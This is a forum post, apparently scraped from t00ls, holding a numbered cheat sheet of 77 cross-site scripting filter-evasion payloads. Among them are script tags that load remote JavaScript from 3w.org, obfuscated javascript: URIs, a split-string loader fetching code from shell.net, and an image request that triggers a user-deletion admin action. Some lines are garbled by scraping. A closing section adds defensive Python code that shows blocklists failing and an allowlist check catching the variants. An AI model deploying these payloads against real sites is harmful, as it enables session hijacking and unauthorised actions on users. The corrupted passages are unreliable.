It seems t00ls has rather little material on XSS; I saw something good and copied it over, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (everything must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2. Null characters basically have no effect domestically, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META with link URL
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a broken-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE with expression
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use it from there
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded commands; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded commands (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( |( i7 b2 }8 @; m- D2 C; w(61)绕符号过滤) S. m X) ]/ b1 u* a
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>; s5 C' v1 D# r# f: |. Z
(62)
$ q4 [4 p* p. N, O- p% |<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>& m+ \6 _3 r! k- V% G4 Q9 d
(63)( O9 Z, S: `# @ h
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>+ ?0 Z2 o1 P2 t0 ^* {, {# k
(64)
6 I1 d9 u$ p: Z& C<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>( Z; R1 z( V. E$ B# E D! _
(65)
9 A" k# X( r3 y5 r0 z) V+ P<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 O6 S M# Y$ t3 E, X' ]( w) D(66)12-7-1 T00LS - Powered by Discuz! Board; R+ @" t7 B0 f! H( P- ^
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
% t+ @1 O- {' o4 M<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
& z0 L8 S" ?2 V) P1 \(67)" E3 k8 q3 H4 k
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>5 V/ U2 M& j# H
</SCRIPT>- X& |/ I; n* ]8 Q/ m
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal (dword) IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS (trailing dot)
<A HREF="http://www.google.com./">XSS</A>
(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
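Added here as a defender-side example; it is not part of the original post, the fuzzexp.org article, or the cheat sheet they copy. Most of the IMG/LINK/A-tag vectors above work because a filter looks for the literal string "javascript:" while the browser tolerates case changes (4), HTML entities with or without semicolons (5, 8, 9, 10), embedded tabs, newlines and carriage returns (11-15), null bytes (17) and leading spaces (19). The code below shows a substring blocklist missing those variants, then a normalise-then-allowlist scheme check that treats them all the same, plus attribute output encoding for the quote-breakout shape of vector 6. It generalises beyond the listed payloads to any combination of those obfuscations. Function names, the allowlist, the exact set of stripped code points and the sample values are assumptions made for this example, not from the page.

```python
# Defender-side example (added; not from the original post). Shows why a substring
# blocklist fails against the obfuscations in the list above and how a
# normalise-then-allowlist check handles them. All names and samples are constructed.
import html
import re

# Code points to strip before inspecting the scheme: C0 controls and space (0-32),
# plus NBSP, the U+2000-U+200B spaces, ideographic space and the BOM. The latter
# group is an assumption drawn from the note on vector 47; browsers strip tab, LF
# and CR anywhere in a URL and leading/trailing controls and spaces.
_IGNORED = set(range(0, 33)) | {0xA0, 0x3000, 0xFEFF} | set(range(0x2000, 0x200C))

ALLOWED_SCHEMES = {"http", "https", "mailto"}          # assumed policy
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def normalize_url(value: str) -> str:
    """Undo the listed obfuscations so the scheme can be inspected."""
    # HTML entity decoding, with or without trailing semicolons (vectors 5, 8, 9, 10).
    decoded = html.unescape(value)
    # Drop the whitespace/control characters browsers tolerate inside "javascript:"
    # (vectors 11-15, 17, 19, 47).
    cleaned = "".join(ch for ch in decoded if ord(ch) not in _IGNORED)
    # Scheme matching is case-insensitive (vector 4).
    return cleaned.lower()


def has_allowed_scheme(value: str) -> bool:
    """True if the URL is relative or uses an allowlisted scheme; False otherwise."""
    url = normalize_url(value)
    m = _SCHEME_RE.match(url)
    if m is None:
        # No scheme: a relative URL (including scheme-relative "//host/"), which
        # inherits the page's own scheme. Treated as allowed by this policy.
        return True
    return m.group(1) in ALLOWED_SCHEMES


def naive_blocklist_catches(value: str) -> bool:
    """The kind of filter the list above is written to defeat: substring match only."""
    return "javascript:" in value.lower()


def escape_attr(value: str) -> str:
    """Output encoding for a value placed in a quoted HTML attribute. Neutralises the
    quote-breakout shape of vector 6 (""><SCRIPT>...) because the quotes and angle
    brackets no longer reach the HTML parser as markup."""
    return html.escape(value, quote=True)


# Constructed samples in the shape of the vectors above (not copied from the page).
SAMPLES = {
    "plain":       "javascript:alert('XSS')",
    "case":        "JaVaScRiPt:alert('XSS')",
    "tab":         "jav\tascript:alert('XSS')",
    "newline":     "jav\nascript:alert('XSS')",
    "entities":    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "long_nosemi": "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099"
                   "&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
    "null":        "java\x00script:alert('XSS')",
    "leading":     " \t javascript:alert('XSS')",
    "vbscript":    "vbscript:msgbox(\"XSS\")",
    "https":       "https://example.invalid/page",
    "relative":    "/images/logo.png",
}


def audit(samples=SAMPLES):
    """Return {name: (naive_blocklist_catches, allowlist_allows)} per sample."""
    return {name: (naive_blocklist_catches(v), has_allowed_scheme(v))
            for name, v in samples.items()}


if __name__ == "__main__":
    for name, (naive, allowed) in audit().items():
        print(f"{name:12} naive_catches={naive!s:5} allowlist_allows={allowed}")
```

Running it shows the naive blocklist catching only the three samples that contain the literal string (plain, case, leading), while the allowlist rejects every javascript: and vbscript: variant and accepts only the https and relative URLs. The design point is that the check decides what to accept rather than what to reject, and decodes before deciding, so adding another obfuscation layer to the list above does not create a new bypass.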